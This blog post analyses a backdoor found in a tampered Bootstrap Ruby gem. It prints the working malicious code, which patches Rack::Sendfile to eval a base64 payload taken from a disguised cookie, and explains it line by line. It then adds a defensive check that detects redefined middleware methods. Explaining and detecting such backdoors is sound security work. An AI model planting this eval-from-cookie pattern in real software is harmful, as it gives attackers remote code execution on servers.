Security Vulnerability in the Bootstrap Gem

Here is the relevant GitHub issue. They were sneaky: they posted a Ruby gem with some sneaky additions. The malicious code was not posted on GitHub; they were hoping that nobody would notice, but someone did. To pull this off, you'd have to be a fairly sophisticated Rubyist with a good understanding of Rack and some basic knowledge of security exploits. They must have had some time on their hands to pursue such nefarious ends.

Here is the code and my explanation of it:

begin
  require 'rack/sendfile'
  if Rails.env.production? # Continue only if we're in the rails production environment:

    Rack::Sendfile.tap do |r|
      # We're using the tap method. The block parameter, r, will be the Rack::Sendfile class,
      # so whenever you see r, just think "the Rack::Sendfile class".

      r.send :alias_method, :c, :call
      # Creates an alias, c, for the original call instance method of Rack::Sendfile,
      ## so that you could call:
      # middleware = Rack::Sendfile.new(app)
      # middleware.c(env)
      ## and the above would in turn call the ORIGINAL call method contained in the Rack::Sendfile class.

      # This bit redefines the call(e) method which is in the SendFile class: https://github.com/rack/rack/blob/master/lib/rack/sendfile.rb

      r.send(:define_method, :call) do |e|
        begin
          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
          # My limited understanding of what this does - please clarify this if you are more knowledgeable:

          # gets the e['HTTP_COOKIE'] value out of the request environment ('http_cookie'.upcase is just HTTP_COOKIE written obliquely),
          # then it scans for a cookie named ___cfduid (a look-alike of Cloudflare's __cfduid cookie),
          # takes the value of that cookie and converts it to a string,
          # then base64-decodes it, and
          # "eval" simply runs whatever code it's been given, as a string,
          # so someone could simply construct a request with malicious code hidden in a cookie
          # and run it on your server.
          eval(x) if x
        rescue Exception
          # Any error (no such cookie, invalid base64, a failing payload) is swallowed, so the request never raises.
        end

        c(e)
        # After we've done the dirty work, run the ORIGINAL call method, as defined in the Rack::Sendfile class,
        # so no one would be any the wiser. Whenever anything calls the call method, this malicious version is what runs.
      end
    end
  end
rescue Exception
  # Swallow everything, including a failed require of rack/sendfile, so loading the gem never errors out.
  nil
end
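The wrapping trick above (alias the original call, then define_method a replacement that delegates to it) leaves a footprint: Rack::Sendfile#call no longer resolves to a file inside the rack gem. The following is an added example, not code from the original post or from the gem, of a defender-side integrity check built on that fact. It reports every instance method of a middleware class whose source_location falls outside the directories you trust. FakeRack::Sendfile, the temp "gem" directory, and apply_wrapper are stand-ins constructed for the example (the wrapper only stamps the env instead of evaluating a cookie); in a real app you would pass Rack::Sendfile and the installed rack gem's directory, e.g. Gem.loaded_specs['rack'].full_gem_path.

```ruby
# Added example (not from the original post): a defender-side integrity check
# that reports which instance methods of a middleware class resolve to a file
# outside the directories you trust (e.g. the installed rack gem). A wrapper
# installed with alias_method/define_method from another gem shows up here.
require 'tmpdir'
require 'fileutils'

module MethodIntegrity
  # Returns [[name, file, line], ...] for every instance method defined directly
  # on klass whose source file is not under one of trusted_dirs.
  # Methods with no source location (native/C) are skipped.
  def self.untrusted_methods(klass, trusted_dirs)
    dirs = trusted_dirs.map { |d| File.expand_path(d) + File::SEPARATOR }
    names = klass.instance_methods(false) + klass.private_instance_methods(false)
    names.map { |name| [name, *klass.instance_method(name).source_location] }
         .reject { |_, file, _| file.nil? }
         .reject { |_, file, _| dirs.any? { |d| File.expand_path(file).start_with?(d) } }
  end
end

# Stand-in for Rack::Sendfile, written to a temp directory that plays the role of
# the trusted gem directory so that its source_location differs from this script.
# (Constructed for this example; the real class lives in the rack gem.)
def load_stand_in_middleware
  dir = Dir.mktmpdir('trusted_gem')
  at_exit { FileUtils.remove_entry(dir) }
  File.write(File.join(dir, 'sendfile.rb'), <<~RUBY)
    module FakeRack
      class Sendfile
        def initialize(app)
          @app = app
        end

        def call(env)
          @app.call(env)
        end
      end
    end
  RUBY
  load File.join(dir, 'sendfile.rb')
  dir
end

# Reproduces the wrapping pattern from the post (alias the original #call, then
# redefine #call to do something extra before delegating). The extra work here
# only stamps the env, standing in for whatever the wrapper really does.
def apply_wrapper(klass)
  klass.tap do |r|
    r.send :alias_method, :c, :call
    r.send(:define_method, :call) do |e|
      e['wrapper_ran'] = true
      c(e)
    end
  end
end

TRUSTED_DIR = load_stand_in_middleware
# Pristine class: every method lives in the trusted directory.
BEFORE = MethodIntegrity.untrusted_methods(FakeRack::Sendfile, [TRUSTED_DIR])
apply_wrapper(FakeRack::Sendfile)
# Wrapped class: #call now resolves to this script. The alias :c still points at
# the original body, so it is reported as trusted; the redefined :call is not.
AFTER = MethodIntegrity.untrusted_methods(FakeRack::Sendfile, [TRUSTED_DIR])

# The wrapped middleware still serves requests normally, which is why the
# check above, not observed behaviour, is what surfaces the change.
def demo_request
  app = ->(_env) { [200, {}, ['ok']] }
  env = {}
  status, = FakeRack::Sendfile.new(app).call(env)
  [status, env['wrapper_ran']]
end

if __FILE__ == $PROGRAM_NAME
  puts "before wrapping: #{BEFORE.inspect}"
  puts "after wrapping:  #{AFTER.inspect}"
  puts "request result:  #{demo_request.inspect}"
end
```

Run it once at boot (after Bundler has required everything) against the middleware classes you rely on; any hit is worth a look at the gem that owns the reported file. Methods defined in C have no source_location and are skipped, so the check is about Ruby-level redefinition only.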
Written on April 4, 2019